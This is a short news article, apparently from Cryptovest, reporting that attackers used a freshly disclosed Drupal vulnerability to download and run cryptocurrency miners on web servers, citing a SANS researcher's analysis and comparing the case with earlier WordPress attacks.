A recently-discovered vulnerability in Drupal, a content management system for web servers, was exploited by hackers in several occasions to mine cryptocurrencies, according to an analysis by a member of the SANS Technology Institute.
One of the most prominent attack vectors was a downloader that would dump the miner and then start it up.
“This exploit downloads a crypto coin miner and then, in a second attempt, starts it. These three commands are sent as two distinct exploit requests. We have seen a total of 3,814 requests,” wrote Johannes B. Ullrich, dean of research at SANS.
Our own investigation shows that the two IP addresses that the miners lead to are shared servers, meaning that they host various websites, which might include mining pool entities.
The fake request itself includes Baidu—a popular Chinese search engine—as its referrer, suggesting that the attacks are coming from an actor in that country.
It’s important to note, however, that putting Baidu’s URL as a referrer does not definitively prove that the hackers are Chinese.
Last year, we saw hackers using vulnerabilities in other content management systems like Wordpress to mine cryptocurrencies. This is the first time we see Drupal get hit.
Perhaps it took so long because Drupal has only 4.6% of the market share as a content management system, whereas WordPress gobbles up nearly 60% of the market.
This is similar to the explanation behind the lack of MacOS viruses in comparison to Windows.
Ullrich also notes that these exploits were designed to work with Drupal 8, although it’s also been adapted to work with version 7.
Since the exploit was discovered only last Friday, most websites running the CMS right now would still be vulnerable to it until they update their software.
This article appeared first on Cryptovest